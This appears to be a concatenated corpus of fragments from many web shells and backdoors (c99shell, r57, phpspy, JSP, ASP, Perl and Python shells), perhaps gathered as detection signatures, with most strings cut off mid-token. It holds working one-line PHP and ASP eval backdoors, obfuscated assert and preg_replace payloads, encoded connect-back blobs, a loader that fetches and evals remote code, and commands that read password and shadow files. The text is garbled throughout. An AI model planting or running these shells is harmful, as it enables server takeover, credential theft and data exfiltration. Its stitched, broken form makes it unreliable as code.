onclick=\"g(\\'filestools\\',null,\\''.urlencode($f['natable.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbname+\"')\"<p><input type=\\\"hidden\\\" name=\\\"selectdb\\\" value=\\\"\"+selectdb+\" sbcopy.append(\"<input type=button name=goback value=' \"+strback[languageno]+echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_nameecho sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size=\"<h2>remote control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var\"<p>current file (import new file name and new file)<br /><input class=\\\"inpu\"<p>current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i<input title=\"upload selected file to the current working directory\" type=\"su<input title=\"launch command in current directory\" type=\"submit\" class=\"but<input title=\"delete all selected files and directories incl. subdirs\" class=uplinfo info = uploadmonitor.getinfo(fi.clientfilename);long time = (system.currenttimemillis() - starttime) / 1000l;elseif(($regwrite) and !empty($_post['writeregname']) and !empty($_post['regtypeecho \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"psbfile.append(\" &nbsp;<a href=\\\"javascript:doform('down','\"+formatpath(strdsbfile.append(\" &nbsp;<a href=\\\"javascript:doform('edit','\"+formatpath(strdiprivate string[] _textfiletypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\",\\\" name=\\\"upfile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typif (request.getparameter(\"password\") == null && session.getattribute(\"passwor<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['commaecho $msg=@copy($_files['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_file<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; $prog = isset($_post['prog']) ? $_post['prog'] : \"/c net start > \".$pathname.else {echo \"running datapipe... ok! connect to <b>\".getenv(\"server_addr\"<a href=\"javascript:godir(\\''.$drive->path.'/\\');p('<h2>file manager - current disk free '.sizecount($free).' of '.sizecount($all$mainpath_info = explode('/', $mainpath);if (!isset($_get['action']) or empty($_get['action']) or ($_get['action'] == \"durl_con.setrequestproperty(\"referer\", \"\"+fckal+\"\");filelocalupload(uc(dx())+sxm,request.getrequesturl().tostring(), \"gbk\");if (($i = array_search($_request['command'], $_session['history'])) !== falsif (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_request['command'])) {&nbsp;<textarea name=\"cqq\" rows=\"20\" cols=\"100%\"><%=sbcmd.tostring()%></teosw = new bufferedwriter(new outputstreamwriter(os));sock = new socket(ipaddress, (new integer(ipport)).intvalue());isr = new bufferedreader(new inputstreamreader(is));sbfolder.append(\"<tr><td >&nbsp;</td><td>\");return filesize / intdivisor + \".\" + straftercomma + \" \" + strunit;fileinfo fi = (fileinfo) ht.get(\"cqquploadfile\");<input type=\"hidden\" name=\"cmd\" value=\"<%=strcmd%>\">while ((nret = insreader.read(tmpbuffer, 0, 1024)) != -1) {password = (string)session.getattribute(\"password\");insreader = new inputstreamreader(proc.getinputstream(), charset.forname(\"gb231$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";while(list($kname, $columns) = @each($index)) {$tabledump = \"drop table if exists $table;\\n\";$tabledump .= \" primary key ($colnames)\";filename: backupkvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiaoc3rydwn0ihnvy2thzgryicopiczzaw4sihnpemvvzihzdhj1y3qgc29ja2fkzhipksk8mckgew0kic$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");while($data=ocifetchinto($stm,$data,oci_assoc+oci_return_nulls))$res.=implode('|while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"error: \".$stri<option value=\"find /etc/ -type f -perm -o+w 2> /dev/null\"<option value=\"cat /proc/version /proc/cpuinfo\">cpuinfo<option value=\"wget http://ftp.powernet.com.tr/supermail/de<option value=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">user<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type=$uploadfile = $_post['path'].$_files['file']['name'];elseif (!empty($_post['ac'])) {$ac = $_post['ac'];}if ($_post['path']==\"\"){$uploadfile = $_files['file']['name'];}echo \"<b>hexdump:</b><nobr>if ($filestealth) {$stat = stat($d.$f);}while ($row = mysql_fetch_array($result, mysql_num)) { echo \"<tr><td>\".$rif ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"db echo \"<center><b>server-status variables:</b><br><br>\";echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>$this -> addfile($content, $filename);function addfile($data, $name, $time = 0) {function unix2dostime($unixtime = 0) {foreach($filelist as $filename){ if (unlink(_file_)) {@ob_clean(); echo \"thanks for using c99shell v.\".$shv \"c99sh_backconn.pl\"=>array(\"using perl\",\"perl %path %host %port\"),<br><table style=\"border-collapse: collapse\" cellspacing=0 bordercolordark=#66 elseif (!$data = c99getsource($bind[\"src\"])) {echo \"can't download sources \"c99sh_datapipe.pl\"=>array(\"using perl\",\"perl %path %localport %remotehos elseif (!$data = c99getsource($bc[\"src\"])) {echo \"can't download sources!\"\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>\"+out.println(\"<h2>file manager - current disk &quot;\"+(cr.indexof(\"/\") == 0?string execute = f.canexecute() ? \"checked=\\\"checked\\\"\" : \"\";\"<td nowrap>\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>return new double(format.format(value)).doublevalue();file tempf = new file(savepath);if (tempf.isdirectory()) {$bindport_pass = \"c99\"; else {echo \"<b>execution php-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr$res = @mysql_query(\"show create table `\".$_post['mysql_tbl'].\"`\", $d$sql1 .= $row[1].\"\\r\\n\\r\\n\";if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }foreach($values as $k=>$v) {$values[$k] = addslashes($v);}body, td, tr {$d=str_replace(\"\\\\\",\"/\",$d);if ($file==\".\" || $file==\"..\") continue;string savepath = request.getparameter(\"savepath\");url downurl = new url(downfileurl);if (util.isempty(downfileurl) || util.isempty(savepath))string downfileurl = request.getparameter(\"url\");fileinputstream finput = new fileinputstream(f);urlconnection conn = downurl.openconnection();sis = request.getinputstream();<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"></head><input type=\"hidden\" name=\"_eventtarget\" value=\"\" /><input type=\"hidden\" name=\"_eventargument\" value=\"\" /><table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol kb </td><table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"<!-- <tr align=\"center\"> http://www.4ngel.net</a> | <a href=\"?action=phpenv\">phpecho $msg=@fwrite($fp,$_post['filecontent']) ? \"codz by angel$res = @shell_exec($cfe);$res = @ob_get_contents();@exec($cfe,$res);private static final int editfield_rows = 30;private static string tempdir = \".\";<input type=\"hidden\" name=\"dir\" value=\"<%=request.getattribute(\"dir\")%>\"\" <select name='encode' class='input'><option value=''>ansi</option><option valjsession.setattribute(\"msg\",\"<span style='color:red'>upload file failed!</spafile f = new file(jsession.getattribute(current_dir)+\"/\"+filebean.getfilename(((invoker)ins.get(\"vd\")).invoke(request,response,jsession);$handle = @opendir($dir) or die(\"can't open directory $dir\");if(!empty($_post['mysql_db'])) { @mssql_select_db($_post['mysql_db'],$db); }if (!isset($_server['php_auth_user']) || $_server['php_auth_user']!==$name || $_,htaprewop(ecalper=htaprewop:fi dne:0=kotide:1 - eulavtni = eulavtni:neht 1 => ej \"<form action='\"&url&\"?action2=post' method='post' name='editform'><input nerror_reporting(0);session_start();header(\"content-type:text/html;charset=utf-8function fvm(jwv):if jwv=\"\"then:fvm=jwv:exit function:end if:dim tt,sru:tt=\"<option value=\"\"drop table [jnc];exec mast\"&kvp&\"er..xp_regwrite 'hkey_localif qpv=\"\" then qpv=\"x:\\program files\\mysql\\mysql server 5.0\\my.ini\"&br&\">www.expdoor.com</a> <input name=\"filename\" type=\"text\" value=\"asp_ver.asp\" size=\"20\" maxset file=fs.opentextfile(server.mappath(filename),8,true) 'set fs=server.createobject(\"scripting.filesystemobject\") '<title>expdoor.com asp<?php $s=@$_get[2];if(md5($s.$s)==<%eval(request(chr(112))):set fso=createobject$i = pack('c*', 0x70, 0x61, 99, 107); 'h' => $i('h*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),//http://require.duapp.com/session.phpif(!isset($_session['t'])){$_session['t'] = $globals['f']($globals['h']);}//define('pass','123456');$globals['c']($globals['e'](null, $globals['s']('%s',$globals['p']('h*',$_sessiovoid aa(stringbuffer sb)throws exception{file r[]=file.listroots();for(int i=0;ibw.write(z2);bw.close();sb.append(\"1\");}else if(z.equals(\"e\")){ee(z1);sb.appif(z.equals(\"a\")){string s=new file(application.getrealpath(request.getrequest// web shell!!@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6$default_charset = \"utf-8\";// url:http://www.weigongkai.com/shell/if (strpos($_server['http_user_agent'], 'ebsd') == false) {setcookie('key', $_post['pwd'], time() + 3600 * 24 * 30);$_session['code'] = _request(sprintf(\"%s?%s\",pack(\"h*\",'6874if (preg_match(\"/^http\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))eval(gzuncompress(gzuncompress(crypt::decrypt($_session['code'], $_cif (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))if(is_readable($path)) antivirus($path.'/',$exs,$matches);'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_oncemail: chinese@hackermail.comif($_get[\"hackers\"]==\"2b\"){if ($_server['request_method'] == 'post') { echo site: http://blog.weili.me<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi$file = !empty($_post[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_poif (true==@move_uploaded_file($_files['userfile']['tmp_name'],self::convert_processed in <span id=\"runtime\"></span> second(s) {gzip} usage:<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm<%@page import=\"java.io.*\"%><%if(request.getparameter(\"f\")<?php eval($_post[1]);?> <%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!s<[url=mailto:?@array_map($_get[]?@array_map($_get['f'],$_get[/url]);?>:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316@preg_replace(\"/f/e\",$_get['u'],\"fengjiao\"); qq(cs, z1, z2, sb,z2.indexof(\"-to:\")!=-1?z2.substring(z2.indexof(\"-to:\")+4,zsb.append(l[i].getname() + \"/\\t\" + st + \"\\t\" + l[i].length()+ \"\\t\" + sqresultset r = s.indexof(\"jdbc:oracle\")!=-1?c.getmetadata()return drivermanager.getconnection(x[1].trim()+\":\"+x[4],x[2].equalsignorecase(sod=array(\"d\",\"7\",\"s http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave <% a=request(chr(97)) executeglobal(strreverse(a)) %>array_map(\"asx73ert\",(arpreg_replace(\"/[errorpage]/e\",$page,\"saft\");shell.php?qid=zxexp <?php array_map(\"ass\\x65rt\",(array)$_request['expdoor']);?><?php eval(str_rot13('riny($_cbfg[cntr]);'));?><?$_uu=chr(99).chr(104).chr(114);$_cc=$_uu(101).$_uu(118).$_uu(97).$_uu(108).$_uecho \"<font color=blue>error!</font>\";<input type=\"text\" size=61 name=\"f\" value='<?php echo $_server[\"script_file - expdoor.com</title>$f=fopen($_post[\"f\"],\"w\");<textarea name=\"c\" cols=60 rows=15></textarea><br>execute morficoder(\")/*/z/*/(tseuqer lave\")function morficoder(code)morficoder=replace(replace(strreverse(code),\"/*/\",\"\"\"\"),\"\\*\\\",vbcrlf)my @adms=(\"kelserific\",\"puna\",\"nod32\")#acesso a shel - 1 on 0 offhttp://michaeldaw.org 2006or http://<? echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! (maybe you didn't enter any text?)#we are: masterkid, alexutz, fatman & mikutul echo --==userinfo==-- ; id;echo;echo --==directory==-- ; pwd;echo; echo --==shelconnectback backdoortarget fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>eval(base64_decode(\"zxzhbchiyxnlnjrfzgvjb2rlkcjhv2r1yjnkbfgzvnpawepmwvdkdmnuuw9<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center$back_connect_p=\"iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjglhzgrypwluzxrfyxrvbiecho '<h1>execution php-code</h1><div class=content><form name=pf method=posecho \"[dir] <a href=\\\"\".$_server['php_self'].\"?rep=\".realpath($rep.\"..class backdoor {echo \"<a href=\\\"\".$_server['php_self'].\"?copy=1\\\">copier un fichier</a> <if int((1-0+1)*rnd+0)=0 then makeemail=maketext(8) & \"@\" & maketext(8) & \".\"<form name=frmcmd method=post action=\"<%=gurl%>\">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>></td><td><input type=\"submitprint \"\\n\".'<tr><td width=100pt class=linelisting><nobr>post (php eval)</td><dizin</font></b></font><font face=\"verdana\" style=\"font-size: 8pt\"><s72 shell v1.0 codinf by cr@zy_kingecho \"<p align=center>dosya zaten bulunuyor</p>\"<?$d='g7mhwq9vvxil/qx2oz2vtdpo6g3fyaa6x+8dmizcd0ehzabzh7jfpzzuz7xnenxsyvbp2wy36ukacak fso 1.0if request.querystring(\"tgh\") = \"1\" then<font color=\"#858585\">buqx</font></a></font><font face=\"verdana\" style=mailto:buqx@hotmail.comlord of iran hackers sabotagelord-c0d3r-nt$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);# [+] domain name address typewww.antichat.rucan't open file, permission denidehas been already loaded. php emperor <xb5@hotmail.action=mysqlread&mass=loadmass\">load all defaultsif (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthruprint \"<tr><td><b>server is:</b></td><td>\".$_server['server_signature'].\"</tdprint \"<tr><td><b>execute command:</b></td><td><input size=100 name=\\\"_cmdcoded by n0 [nzer0] www.cyberlords.netu29mdhdhcmuaqwrvymugsw1hz2vszwfkexhjztwaaaamuexurf///waaajmzzaaaacjourkaaaaereturn \"<br>dump error! can't write to \".htmlspecialchars($file);call os.run(\"win.com cmd.exe /c del \"& sztf,0,true)<div align=\"left\"><font size=\"1\">input command :</font></div><input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br><input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>ayyildiztouch by ijoofirst we check if there has been asked for a working directoryhttp://ayyildiz.org/images/whosonline2.gifejder was here*~pu*&bp[_)f!8c2f*@#@&~,p~p,~p&q~8bpms~9~~lb~x`v,_,f&*~,jcw~~[_c3trffzq@#@&pp,~~lama's'hellif($_post['king'] == \"\") {if (move_uploaded_file($_files['fila']['tmp_name'], $curdir.\"/\".$_files['fnewhtml = '<b>file browser is under construction! use at your own risk!</b> <br>empty command..type \\\"shellhelp\\\" for some ehh...helpnewhtml = '<font size=0><b>this will reload the page... :(</b><br><br><form enctjspwebshellcreateanddeletefolder is error:<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryhashtable(\"java.cstring _password =\"111\";$baglan=fopen(\"/tmp/$ekinci\",'r');$tampon4=$tampon3-1@aventgrup.net$yazi = \"test\" . \"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. we must be carefull if the parent $tmpfile = tempnam('/tmp', 'phpshell');if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {www.rohitab.comprint \"set-cookie: savedpwd=;\\n\"; # remove password cookie$prompt = $winnt ? \"$currentdir> \" : \"[admin\\@$servername $cwww.ironwarez.info$cookiename = \"wieeeee\";~ shell iwww.rootshell-team.infosetcookie($cookiename, $_post['pass'], time()+3600);www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tanprint(\"<br>provenance du mail : <input type=\\\"text\\\" name=\\\"provenancif mcolformelem.exists(lcase(sindex)) then form = mcolformelem.item(lcase(sindex))session(\"shagman\")=// note that linux = cmd and windows = \"cmd.exe /c + cmd\" h4ntu shellsystem(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run</div>$file1 - $file2 - <a href=$script_name?$query_string&see=$file>$file</a><br>[*] spawning shellcha0shttp://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename<th>type</th><th>&nbspm&nbsp</th><th>&nbspd&nbsp</th><th>unsigned</th><th>zerofi<title>g-security webshell</title><input type=text name=\"-cmd\" size=64 value=\"<?=$cmd?>\" <? if($cmd != \"\") print shell_exec($cmd);?><? $cmd = $_request[\"-cmd\"];?>echo \"<b>changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur<tr><form method=post><td><font color=red><b>back connect:</b></font></td><td><i$perl_proxy_scp = \"iyevdxnyl2jpbi9wzxjsicancimhl3vzci91c2mvcgvybc81ljawnc9iaw4v<tr><form method=post><td><font color=red><b>backdoor:</b></font></td><td><input.textbox { background: white; border: 1px #000000 solid; color: #000099; font-fa<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''echo \"<hr size=\\\"1\\\" noshade><b>done!</b><br>total time (secs.): \".$ft$fqb_log .= \"\\r\\n------------------------------------------\\r\\ndone!\\r'eng_text71'=>\"second commands param is:\\r\\n- for chown - name of new owner oif(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new searchresult\"aaaaach5baeaaakalaaaaaauabqaaar0mmljqyzfalqeqjugeqscnwg6fogpkhamf4hajswh7/ze\"\"mtp/zdp//2yaagyam2yazmyamwyazgya/2yzagyzm2yzzmyzmwyzzgyz/2zmagzmm2zmzmzmmwzm\"\"r0lgodlhfaauakl/ap/4/8dawh9/ap/4al+/vwaaaaaaaaaaach5baeaaaealaaaaaauabqaqamo\"echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_post['echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db> if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\" if (file_exists($mkfile)) {echo \"<b>make file \\\"\".htmlspecialchars($mkfile echo \"<center><b>mysql \".mysql_get_server_info().\" (proto v.\".mysql_get_pr elseif (!fopen($mkfile,\"w\")) {echo \"<b>make file \\\"\".htmlspecialchars($m$sess_data[\"cut\"] = array(); c99_sif ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))c99sh_sqlqueryelse {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != directory_sepaelse {echo \"<b>file \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',$name='ec371748dc2da624b35a4f8f685dd122'echo ws(2).$lb.\" <a$sql = \"load data infile \\\"\".$_post['test3_file']if (empty($_post['cmd'])&&!$safe_mode) { $_post['cmd']=($windows)?(\"dir\"):(\"lif(eregi(\"./shbd $por\",$scan))$_post['backconnectip']$_post['backcconnmsg']if(rmdir($_post['mk_name']))$r .= '<tr><td>'.ws(3).'<font face=verdana size=-2><b>'.$key.'</b></font></td>if(unlink($_post['mk_name'])) echo \"<table width=100% cellpadding=0 cell\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mviecho \"<b>execute file:</b><form action=\\\"\".$surl.\"\\\" method=post><inpu\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswdreturn $type . $owner . $group . $other;$owner = ($mode & 00400) ? 'r' : '-';sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0a8c3lzl3nvy2tldc5opg0ki2luy2x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxlcnjuby5opg<b>dumped! dump has been writed to if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<table st<input type=submit name=actarcbuff value=\\\"pack buffer to archive@ini_set(\"highlightecho \"<b>result of execution this php-code</b>:<br>\";{$row[] = \"<b>owner/group</b>\";}echo $uname.\"</font><br><b>\";while(!feof($f)) { $res.=fread($f,1024); }echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()c99ftpbrutecheck$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);$fqb_lenght = 